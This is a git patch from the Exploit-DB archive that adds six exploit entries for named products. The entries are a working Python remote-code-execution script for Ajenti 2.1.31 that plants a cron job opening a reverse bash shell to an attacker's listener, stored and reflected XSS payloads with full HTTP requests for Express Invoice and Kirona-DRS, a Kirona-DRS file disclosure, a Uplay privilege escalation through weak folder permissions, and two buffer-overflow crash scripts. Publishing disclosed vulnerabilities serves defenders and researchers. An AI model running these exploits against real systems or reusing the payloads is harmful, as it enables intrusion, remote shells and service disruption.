From 7c5ad20e7230f9f13a859aa0b0622ede8badddc5 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Tue, 15 Oct 2019 05:01:47 +0000
Subject: [PATCH] DB: 2019-10-15

6 changes to exploits/shellcodes

SpotAuditor 5.3.1.0 - Denial of Service
ActiveFax Server 6.92 Build 0316 - 'POP3 Server' Denial of Service

Uplay 92.0.0.6280 - Local Privilege Escalation
Express Invoice 7.12 - 'Customer' Persistent Cross-Site Scripting
Ajenti 2.1.31 - Remote Code Execution
Kirona-DRS 5.5.3.5 - Information Disclosure
---
 exploits/php/webapps/47496.txt   |  62 ++++++
 exploits/php/webapps/47498.txt   | 329 +++++++++++++++++++++++++++++++
 exploits/python/webapps/47497.py | 115 +++++++++++
 exploits/windows/dos/47494.py    |  32 +++
 exploits/windows/dos/47495.py    |  31 +++
 exploits/windows/local/47493.txt |  43 ++++
 files_exploits.csv               |   6 +
 7 files changed, 618 insertions(+)
 create mode 100644 exploits/php/webapps/47496.txt
 create mode 100644 exploits/php/webapps/47498.txt
 create mode 100755 exploits/python/webapps/47497.py
 create mode 100755 exploits/windows/dos/47494.py
 create mode 100755 exploits/windows/dos/47495.py
 create mode 100644 exploits/windows/local/47493.txt

diff --git a/exploits/php/webapps/47496.txt b/exploits/php/webapps/47496.txt
new file mode 100644
index 000000000..ea140408b
--- /dev/null
+++ b/exploits/php/webapps/47496.txt
@@ -0,0 +1,62 @@
+# Exploit Title: Express Invoice 7.12 - 'Customer' Persistent Cross-Site Scripting
+# Exploit Author: Debashis Pal
+# Date: 2019-10-13
+# Vendor Homepage: https://www.nchsoftware.com/
+# Source: https://www.nchsoftware.com/invoice/index.html
+# Version: Express Invoice v7.12
+# CVE : N/A
+# Tested on: Windows 7 SP1(32bit)
+
+# About Express Invoice v7.12
+==============================
+Express Invoice lets you create invoices you can print, email or fax directly to clients for faster payment. 
+
+# Vulnerability 
+================
+Persistent Cross site scripting (XSS).
+
+# PoC 
+======
+
+1. Login as authenticated unprivileged user to Express Invoice version 7.12 web enable service i.e  http://A.B.C.D:96 [Default installation]. 
+
+2. Under "Invoices" Invoices List -> View Invoices -> Add New Invoice -> Customer: Field put </script><script>alert('XSS');</script>
+
+Save the change. 
+
+or 
+
+Under "Items" 
+Items -> Add new item-> Item field: put  </script><script>alert('XSS');</script>
+
+Save the change. 
+
+or 
+
+Under "Customers" 
+Customers -> Add New Customer -> Customer Name:  put  </script><script>alert('XSS');</script>
+
+Save the change. 
+
+or 
+
+Under "Quotes"
+Quotes -> View Quotes -> Add New Quote -> Customer: put  </script><script>alert('XSS');</script>
+
+Save the change. 
+
+3. Login in authenticated privileged or unprivileged  user to Express Invoice v7.12 web enable service and visit any of Invoices/Items/Customers/Quotes section, Persistent XSS payload will execute.
+
+
+# Disclosure Timeline
+======================
+Vulnerability Discover Date: 12-Sep-2019.
+Vulnerability notification to vendor via vendor provided web form: 12-Sep-2019 ,13-Sep-2019, 19-Sep-2019, 26-Sep-2019, no responds. 
+Submit exploit-db : 14-Oct-2019.
+
+
+# Disclaimer
+=============
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information.
+The author prohibits any malicious use of security related information or exploits by the author or elsewhere.
\ No newline at end of file
diff --git a/exploits/php/webapps/47498.txt b/exploits/php/webapps/47498.txt
new file mode 100644
index 000000000..0110ed369
--- /dev/null
+++ b/exploits/php/webapps/47498.txt
@@ -0,0 +1,329 @@
+# Exploit Title: Kirona-DRS 5.5.3.5 - Information Disclosure
+# Discovered Date: 2019-10-03
+# Shodan Search: /opt-portal/pages/login.xhtml
+# Exploit Author: Ramikan
+# Vendor Homepage: https://www.kirona.com/products/dynamic-resource-scheduler/
+# Affected Version: DRS 5.5.3.5 may be other versions.
+# Tested On Version: DRS 5.5.3.5 on PHP/5.6.14
+# Vendor Fix: Unknown
+# CVE: CVE-2019-17503,CVE-2019-17504
+# Category: Web Apps
+# Reference : https://github.com/Ramikan/Vulnerabilities/blob/master/Kirona-DRS 5.5.3.5 Multiple Vulnerabilities
+
+# Description:
+# The application is vulnerable to the HTML injection, reflected cross site scripting and sensitive data disclosure.
+
+# Vulnerabiity 1:HTML injection and  (CVE-2019-17504)
+# An issue was discovered in Kirona Dynamic Resource Scheduling (DRS) 5.5.3.5. A reflected Cross-site scripting (XSS) 
+# vulnerability allows remote attackers to inject arbitrary web script via the /osm/report/ 'password' parameter.
+
+Affected URL: /osm/report/ 
+
+Affected Parameter: password
+
+
+POST Request:
+
+POST /osm/report/ HTTP/1.1
+Host: 10.50.3.148
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 147
+Connection: close
+Referer: https://10.50.3.148/osm/report/
+Upgrade-Insecure-Requests: 1
+
+create=true&password=&login=admin&password='<" ><<h1>HTML Injection-heading tag used</h1><script>alert("This is Cross Site Scripting")</script><!--
+
+
+Response:
+
+HTTP/1.1 200 OK
+Date: Thu, 03 Oct 2019 14:56:05 GMT
+Server: Apache
+X-Powered-By: PHP/5.6.14
+Access-Control-Allow-Origin: *
+Access-Control-Allow-Headers: X-Requested-WithXDomainRequestAllowed: 1
+Expires: Mon, 26 Jul 1997 05:00:00 GMT
+Last-Modified: Thu, 03 Oct 2019 14:56:05 GMT
+Cache-Control: no-cache, must-revalidate
+Pragma: no-cache
+Content-Length: 728
+Connection: close
+Content-Type: text/html;charset=UTF-8
+
+          <html>
+          <head>  
+            <img src='logo.jpg'>      
+            <form method='POST'>
+              <input type='hidden' name='create' value='true'/>
+              <input type='hidden' name='password' value=''<" ><<h1>HTML Injection-heading tag used</h1><script>alert("This is Cross Site Scripting")</script><!--'/>
+              <table>
+                  <tr><td>Login:</td><td><input type='login' name='login'/></td></tr>
+                  <tr><td>Password:</td><td><input type='password' name='password'/></td></tr>
+                  <tr><td colspan='2'><input type='submit' value='Login'/> </td></tr>
+              </table>
+            </form>
+          </head>
+          </html>
+
+
+GET Request:
+
+GET https://10.0.1.110/osm/report/?password=%27%3C%22%20%3E%3C%3Ch1%3EHTML%20Injection-heading%20tag%20used%3C/h1%3E%3Cscript%3Ealert(%22This%20is%20Cross%20Site%20Scripting%22)%3C/script%3E%3C!-- HTTP/1.1
+Host: vs-kdrs-l-01.selwoodhousing.local
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+
+Response:
+
+HTTP/1.1 200 OK
+Date: Thu, 03 Oct 2019 14:53:35 GMT
+Server: Apache
+X-Powered-By: PHP/5.6.14
+Access-Control-Allow-Origin: *
+Access-Control-Allow-Headers: X-Requested-With
+XDomainRequestAllowed: 1
+Expires: Mon, 26 Jul 1997 05:00:00 GMT
+Last-Modified: Thu, 03 Oct 2019 14:53:35 GMT
+Cache-Control: no-cache, must-revalidate
+Pragma: no-cache
+Content-Length: 728
+Connection: close
+Content-Type: text/html;charset=UTF-8
+
+          <html>
+          <head>  
+            <img src='logo.jpg'>      
+            <form method='POST'>
+              <input type='hidden' name='create' value='true'/>
+              <input type='hidden' name='password' value=''<" ><<h1>HTML Injection-heading tag used</h1><script>alert("This is Cross Site Scripting")</script><!--'/>
+              <table>
+                  <tr><td>Login:</td><td><input type='login' name='login'/></td></tr>
+                  <tr><td>Password:</td><td><input type='password' name='password'/></td></tr>
+                  <tr><td colspan='2'><input type='submit' value='Login'/> </td></tr>
+              </table>
+            </form>
+          </head>
+          </html> 
+        
+
+***************************************************************************************************************************
+Vulnerability 2: Source code and sensitive data disclosure. (CVE-2019-17503)
+***************************************************************************************************************************
+
+An issue was discovered in Kirona Dynamic Resource Scheduling (DRS) 5.5.3.5. An unauthenticated user can access /osm/REGISTER.cmd (aka /osm_tiles/REGISTER.cmd) directly: it contains sensitive information about the database through the SQL queries within this batch file. This file exposes SQL database information such as database version, table name, column name, etc.
+
+Affected URL: /osm/REGISTER.cmd or /osm_tiles/REGISTER.cmd
+
+# Request:
+
+GET /osm/REGISTER.cmd HTTP/1.1
+Host: 10.0.0.148
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+
+Response:
+
+HTTP/1.1 200 OK
+Date: Thu, 03 Oct 2019 09:23:54 GMT
+Server: Apache
+Last-Modified: Tue, 07 Nov 2017 09:27:52 GMT
+ETag: "1fc4-55d612f6cae13"
+Accept-Ranges: bytes
+Content-Length: 8132
+Connection: close
+
+@echo off
+
+set DEBUGMAPSCRIPT=TRUE
+
+rem
+rem Find root path and batch name
+rem root path is found relative to the current batch name
+rem 
+
+rem turn to short filename (remove white spaces)
+for %%i in (%0) do (
+  	set SHORT_MAPSCRIPTBATCH_FILE=%%~fsi
+    set MAPSCRIPTBATCH_FILE=%%~i
+    
+)
+for %%i in (%SHORT_MAPSCRIPTBATCH_FILE%) do (
+	set MAPSCRIPTROOTDIR=%%~di%%~pi..\..\..
+)
+
+if "%DEBUGMAPSCRIPT%"=="TRUE" echo MAPSCRIPTROOTDIR=%MAPSCRIPTROOTDIR%
+if "%DEBUGMAPSCRIPT%"=="TRUE" echo MAPSCRIPTBATCH_FILE=%MAPSCRIPTBATCH_FILE%
+
+rem
+rem find if we are in INTERRACTIVE mode or not and check the parameters
+rem 
+if "%1"=="" goto INTERACTIVE
+goto NONINTERRACTIVE
+
+
+:NONINTERRACTIVE
+rem non interractive call so catch the parameters from command line
+rem this is supposed to be called from the root DRS directory
+
+if "%2"=="" (
+  echo Invalid parameter 2
+  pause
+  goto :EOF
+)
+
+set ACCOUNT=%2
+set STATIC=NO
+if "%1"=="STATIC" set STATIC=YES
+
+if "%DEBUGMAPSCRIPT%"=="TRUE" echo Command line mode %STATIC% %ACCOUNT%
+
+if "%1"=="STATIC" goto GLOBAL
+if "%1"=="DYNAMIC" goto GLOBAL
+echo Invalid parameter 1
+pause
+goto :EOF
+
+:INTERACTIVE
+rem Interractive mode : ask for account and static mode
+if "%DEBUGMAPSCRIPT%"=="TRUE" echo Interractive mode
+echo Open Street Map setup for Xmbrace DRS
+set /P ACCOUNT=Account name:
+set /P STATIC=Limited map feature (YES/NO):
+
+
+rem back to the setup directory
+cd %MAPSCRIPTROOTDIR%
+
+rem # READ AND DEFINE SETTINGS
+for /F "tokens=1,* delims==" %%k in (conf\default.txt) do (
+  if not "%%k"=="#=" set %%k=%%l
+)
+if exist CUSTOM\CONF\custom.txt (
+  for /F "tokens=1,* delims==" %%k in (CUSTOM\CONF\custom.txt) do (
+    if not "%%k"=="#=" set %%k=%%l
+  )
+)
+for /F "tokens=1,* delims==" %%k in (conf\settings.txt) do (
+  if not "%%k"=="#=" set %%k=%%l
+)
+
+if "%APACHE_USE_SSL%"=="TRUE" (
+  set DEFAULT_HTTP_PROTOCOL=https
+  set APACHE_USE_SSL_VALUE=true
+  set DEFAULT_HTTP_PORT=%APACHE_HTTPS_PORT%
+) else (
+  set DEFAULT_HTTP_PROTOCOL=http
+  set APACHE_USE_SSL_VALUE=false
+  set DEFAULT_HTTP_PORT=%APACHE_HTTP_PORT%
+)
+
+goto GLOBAL
+
+
+
+rem
+rem good to go in a non interractive mode
+rem the following is the generic par of the install, whatever we are in static or dynamic mode
+rem
+:GLOBAL
+if "%DEBUGMAPSCRIPT%"=="TRUE" echo Global section
+
+set MYSQL="MYSQL\MySQL Server 5.6 MariaDB\bin\mysql.exe"
+
+echo delete from %ACCOUNT%.asp_custom_action where CA_CAPTION in ('Show on map','Closest')> req.sql
+%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
+
+echo delete from %ACCOUNT%.asp_custom_tab where NAME='Map'> req.sql
+%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
+
+set INSERTFIELDS=%ACCOUNT%.asp_custom_action (CA_CAPTION,CA_VIEW,CA_MODE,CA_LIST_MODE,CA_HEIGHT,CA_WIDTH,CA_RESIZABLE,CA_NEED_REFRESH,CA_PROFILES,CA_URL,CA_CUSTOM_TAB,CA_TRIGGER_MODE)
+
+if "%STATIC%"=="YES" goto :STATIC
+goto :DYNAMIC
+
+
+
+:STATIC
+
+if "%DEBUGMAPSCRIPT%"=="TRUE" echo Static section
+
+echo map=static > ACCOUNTS\%ACCOUNT%\config.txt
+
+echo ^<?php $staticMap=true; ?^>>APACHE\htdocs\osm\mode.php
+
+echo insert into %INSERTFIELDS% values ('Journey on map','workerList','modal','unique',600,1024,true,false,'Administrator','%DEFAULT_HTTP_PROTOCOL%://%OTRMS_HOST%:%DEFAULT_HTTP_PORT%/osm/map.php?account=%ACCOUNT%^&mapType=journey','','button')> req.sql
+%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
+echo insert into %INSERTFIELDS% values ('Journey on map','workerView','modal','unique',600,1024,true,false,'Administrator','%DEFAULT_HTTP_PROTOCOL%://%OTRMS_HOST%:%DEFAULT_HTTP_PORT%/osm/map.php?account=%ACCOUNT%^&mapType=journey','','button')> req.sql
+%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
+if exist req.sql del req.sql
+goto FINAL
+
+
+:DYNAMIC
+
+if "%DEBUGMAPSCRIPT%"=="TRUE" echo Dynamic section
+
+echo map=dynamic > ACCOUNTS\%ACCOUNT%\config.txt
+
+echo ^<?php $staticMap=false; ?^>>APACHE\htdocs\osm\mode.php
+
+echo insert into %INSERTFIELDS% values ('Show on map','jobList','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql
+%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
+echo insert into %INSERTFIELDS% values ('Show on map','jobView','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql
+%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
+
+echo insert into %INSERTFIELDS% values ('Closest','jobList','modal','unique',600,1024,true,false,'Administrator','%DEFAULT_HTTP_PROTOCOL%://%OTRMS_HOST%:%DEFAULT_HTTP_PORT%/osm/map.php?account=%ACCOUNT%^&mapType=closest','','button')> req.sql
+%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
+echo insert into %INSERTFIELDS% values ('Closest','jobView','modal','unique',600,1024,true,false,'Administrator','%DEFAULT_HTTP_PROTOCOL%://%OTRMS_HOST%:%DEFAULT_HTTP_PORT%/osm/map.php?account=%ACCOUNT%^&mapType=closest','','button')> req.sql
+%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
+
+echo insert into %INSERTFIELDS% values ('Show on map','workerList','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql
+%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
+echo insert into %INSERTFIELDS% values ('Show on map','workerView','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql
+%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
+
+echo insert into %INSERTFIELDS% values ('Journey on map','workerList','modal','mandatory',600,1024,true,false,'Administrator','%DEFAULT_HTTP_PROTOCOL%://%OTRMS_HOST%:%DEFAULT_HTTP_PORT%/osm/map.php?account=%ACCOUNT%^&mapType=journey','','button')> req.sql
+rem %MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
+
+echo insert into %INSERTFIELDS% values ('Show on map','customerList','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql
+%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
+echo insert into %INSERTFIELDS% values ('Show on map','customerView','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql
+%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
+
+echo insert into %INSERTFIELDS% values ('Show on map','serviceOrderList','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql
+%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
+echo insert into %INSERTFIELDS% values ('Show on map','serviceOrderView','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql
+%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
+
+echo insert into %INSERTFIELDS% values ('Show on map','planning','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql
+%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
+
+
+set INSERTFIELDS=%ACCOUNT%.asp_custom_tab (NAME,POSITION,ADMIN,URL,WIDTH,HEIGHT)
+
+echo insert into %INSERTFIELDS% values ('Map',0,'false','%DEFAULT_HTTP_PROTOCOL%://%OTRMS_HOST%:%DEFAULT_HTTP_PORT%/osm/map.php?account=%ACCOUNT%','100%%','100%%')> req.sql
+%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
+
+if exist req.sql del req.sql
+goto FINAL
+
+
+:FINAL
+echo Map registred for %ACCOUNT%
+if "%1"=="" pause
+goto :EOF
\ No newline at end of file
diff --git a/exploits/python/webapps/47497.py b/exploits/python/webapps/47497.py
new file mode 100755
index 000000000..2648e5093
--- /dev/null
+++ b/exploits/python/webapps/47497.py
@@ -0,0 +1,115 @@
+# Title: Ajenti 2.1.31 - Remote Code Execution
+# Author: Jeremy Brown
+# Date: 2019-10-13
+# Software Link: https://github.com/ajenti/ajenti
+# CVE: N/A
+# Tested on: Ubuntu Linux
+
+#!/usr/bin/python
+# ajentix.py
+# 
+# Ajenti Remote Command Execution Exploit
+#
+# -------
+# Details
+# -------
+#
+# Ajenti is a web control panel written in Python and AngularJS. 
+#
+# One can locally monitor executed commands on the server while testing
+#
+# $ sudo ./exec-notify (google for "exec-notify.c", modify output as needed)
+# sending proc connector: PROC_CN_MCAST_LISTEN... sent
+# Reading process events from proc connector.
+# Hit Ctrl-C to exit
+#
+# Browse over to https://server:8000/view/login/normal to login
+#
+# .....
+# pid=9889 executed [/bin/sh -c /bin/su -c "/bin/echo SUCCESS" - test ]
+# pid=9889 executed [/bin/su -c /bin/echo SUCCESS - test ]
+#
+# Modified the JSON request username value to be `id`
+#
+# pid=7514 executed [/bin/sh -c /bin/su -c "/bin/echo SUCCESS" - `id` ]
+# pid=7516 executed [id ]
+# pid=7514 executed [/bin/su -c /bin/echo SUCCESS - uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup) ]
+#
+# *ACK.....*
+#
+# Also the login routine times out after 5 seconds (see auth.py), which
+# makes an interactive shell relatively ephemeral. So, we cron job.
+#
+# $ python3 ajentix.py server.ip shell local-listener.ip
+# Done!
+#
+# $ nc -v -l -p 5555
+# Listening on [0.0.0.0] (family 0, port 5555)
+# Connection from server.domain 41792 received!
+# bash: cannot set terminal process group (18628): Inappropriate ioctl for device
+# bash: no job control in this shell
+# nobody@server:/var/spool/cron$ ps
+#   PID TTY          TIME CMD
+#  6386 ?        00:00:00 /usr/local/bin/ <-- ajenti-panel worker
+# 18849 ?        00:00:00 sh
+# 18851 ?        00:00:00 bash
+# 18859 ?        00:00:00 ps
+#
+#
+# Tested Ajenti 2.1.31 on Ubuntu 18.04, fixed in 2.1.32
+# 
+# Fix commit: https://github.com/ajenti/ajenti/commit/7aa146b724e0e20cfee2c71ca78fafbf53a8767c
+#
+#
+
+import os
+import sys
+import ssl
+import json
+import urllib.request as request
+
+def main():
+	if(len(sys.argv) < 2):
+		print("Usage: %s <host> [\"cmd\" or shell...ip]\n" % sys.argv[0])
+		print("Eg:    %s 1.2.3.4 \"id\"" % sys.argv[0])
+		print("...    %s 1.2.3.4 shell 5.6.7.8\n" % sys.argv[0])
+		return
+
+	host = sys.argv[1]
+	cmd = sys.argv[2]
+	
+	if(cmd == 'shell'):
+		if(len(sys.argv) < 4):
+			print("Error: need ip to connect back to for shell")
+			return
+		
+		ip = sys.argv[3]
+
+		shell = "`echo \"* * * * * bash -i >& /dev/tcp/" + ip + "/5555 0>&1\" > /tmp/cronx; crontab /tmp/cronx`"
+		username = shell
+	
+	else:
+		username = "`" + cmd + "`"
+		
+	body = json.dumps({'username':username, 'password':'test', 'mode':'normal'})
+	byte = body.encode('utf-8')
+		
+	url = "https://" + host + ":8000" + "/api/core/auth"
+		
+	try:
+		req = request.Request(url)
+		
+		req.add_header('Content-Type', 'application/json; charset=utf-8')
+		req.add_header('Content-Length', len(byte))
+		
+		request.urlopen(req, byte, context=ssl._create_unverified_context()) # ignore the cert
+			
+	except Exception as error:
+		print("Error: %s" % error)
+		return
+		
+	print("Done!")
+
+
+if(__name__ == '__main__'):
+	main()
\ No newline at end of file
diff --git a/exploits/windows/dos/47494.py b/exploits/windows/dos/47494.py
new file mode 100755
index 000000000..b27d37927
--- /dev/null
+++ b/exploits/windows/dos/47494.py
@@ -0,0 +1,32 @@
+# Exploit Title: SpotAuditor 5.3.1.0 - Denial of Service
+# Author: Sanjana Shetty
+# Date: 2019-10-13
+# Version: SpotAuditor 5.3.1.0
+# Vendor Homepage: http://www.nsauditor.com
+# Software link: http://spotauditor.nsauditor.com/
+
+
+# <POC by Sanjana Shetty>
+# Steps
+
+[1] Install the SpotAuditor software
+
+[2] Access the register functionality
+
+[3] In the name field enter 5000 A's and press enter, this will crash the
+application.
+
+==== use below script to create 5000 A's to a text file and copy it to the name field============
+
+
+print ("# POC by sanjana shetty")
+
+try:
+       f = open("file.txt","w")
+       junk =  "\x41" * 5000
+       f.write(junk)
+       print ("done")
+
+except (Exception, e):
+
+      print ("#error - ") + str(e)
\ No newline at end of file
diff --git a/exploits/windows/dos/47495.py b/exploits/windows/dos/47495.py
new file mode 100755
index 000000000..e72529e10
--- /dev/null
+++ b/exploits/windows/dos/47495.py
@@ -0,0 +1,31 @@
+# Exploit Title: ActiveFax Server 6.92 Build 0316 - 'POP3 Server' Denial of Service
+# Date: 2019-10-12
+# Vendor Homepage: https://www.actfax.com/
+# Software Link :  https://www.actfax.com/download/actfax_setup_x64_ge.exe
+# Exploit Author: Achilles
+# Tested Version: 6.92
+# Tested on: Windows 7 x64
+# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow
+ 
+# Steps to Produce the Crash: 
+# 1.- Run python code : ActiveFax_Server.py
+# 2.- Open EVIL.txt and copy content to clipboard
+# 3.- Open ActiveFaxServer.exe
+# 4.- Open the Pop3 Server Config
+# 5.- Press New
+# 6.- Paste the content of EVIL.txt into the field: 'POP3 Server Address and Login and Password'
+# 7.- Press ok Twice
+# 8.- And you will see a crash.
+
+#!/usr/bin/env python
+
+buffer = "\x41" * 6000
+
+try:
+	f=open("Evil.txt","w")
+	print "[+] Creating %s bytes evil payload.." %len(buffer)
+	f.write(buffer)
+	f.close()
+	print "[+] File created!"
+except:
+	print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/local/47493.txt b/exploits/windows/local/47493.txt
new file mode 100644
index 000000000..c387c0211
--- /dev/null
+++ b/exploits/windows/local/47493.txt
@@ -0,0 +1,43 @@
+# Exploit Title: Uplay 92.0.0.6280 - Local Privilege Escalation
+# Date: 2019-08-07
+# Exploit Author: Kusol Watchara-Apanukorn, Pongtorn Angsuchotmetee, Manich Koomsusi
+# Vendor Homepage: https://uplay.ubisoft.com/
+# Version: 92.0.0.6280
+# Tested on: Windows 10 x64
+# CVE : N/A
+
+# Vulnerability Description: "C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher" has in secure permission 
+# that allows all BUILTIN-USER has full permission. An attacker replace the 
+# vulnerability execute file with malicious file.
+
+///////////////////////
+   Proof of Concept
+///////////////////////
+
+C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher>icacls "C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher"
+C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher BUILTIN\Users:(F)
+                                                     BUILTIN\Users:(OI)(CI)(IO)(F)
+                                                     NT SERVICE\TrustedInstaller:(I)(F)
+                                                     NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
+                                                     NT AUTHORITY\SYSTEM:(I)(F)
+                                                     NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
+                                                     BUILTIN\Administrators:(I)(F)
+                                                     BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
+                                                     BUILTIN\Users:(I)(RX)
+                                                     BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
+                                                     CREATOR OWNER:(I)(OI)(CI)(IO)(F)
+                                                     APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
+                                                     APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
+                                                     APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
+                                                     APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
+
+
+
+
+Vulnerability Disclosure Timeline:
+==================================
+07 Aug, 19 : Found Vulnerability
+07 Aug, 19 : Vendor Notification
+14 Aug, 19 : Vendor Response
+18 Sep, 19 : Vendor Fixed
+18 Sep, 19  : Vendor released new patched
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 6303adc8b..f84711ec5 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6577,6 +6577,8 @@ id,file,description,date,author,type,platform,port
 47487,exploits/windows/dos/47487.txt,"Windows Kernel - Out-of-Bounds Read in nt!MiParseImageLoadConfig While Parsing Malformed PE File",2019-10-10,"Google Security Research",dos,windows,
 47488,exploits/windows/dos/47488.txt,"Windows Kernel - Out-of-Bounds Read in CI!HashKComputeFirstPageHash While Parsing Malformed PE File",2019-10-10,"Google Security Research",dos,windows,
 47489,exploits/windows/dos/47489.txt,"Windows Kernel - Out-of-Bounds Read in nt!MiRelocateImage While Parsing Malformed PE File",2019-10-10,"Google Security Research",dos,windows,
+47494,exploits/windows/dos/47494.py,"SpotAuditor 5.3.1.0 - Denial of Service",2019-10-14,"Sanjana shetty",dos,windows,
+47495,exploits/windows/dos/47495.py,"ActiveFax Server 6.92 Build 0316 - 'POP3 Server' Denial of Service",2019-10-14,stresser,dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10713,6 +10715,7 @@ id,file,description,date,author,type,platform,port
 47477,exploits/windows/local/47477.py,"DeviceViewer 3.12.0.1 - 'add user' Local Buffer Overflow (DEP Bypass)",2019-10-09,"Alessandro Magnosi",local,windows,
 47482,exploits/linux/local/47482.rb,"ASX to MP3 converter 3.1.3.7 - '.asx' Local Stack Overflow (Metasploit_ DEP Bypass)",2019-10-10,max7253,local,linux,
 47490,exploits/windows/local/47490.txt,"National Instruments Circuit Design Suite 14.0 - Local Privilege Escalation",2019-10-11,"Ivan Marmolejo",local,windows,
+47493,exploits/windows/local/47493.txt,"Uplay 92.0.0.6280 - Local Privilege Escalation",2019-10-14,"Kusol Watchara-Apanukorn",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -41822,3 +41825,6 @@ id,file,description,date,author,type,platform,port
 47483,exploits/hardware/webapps/47483.py,"TP-Link TL-WR1043ND 2 - Authentication Bypass",2019-10-10,"Uriel Kosayev",webapps,hardware,80
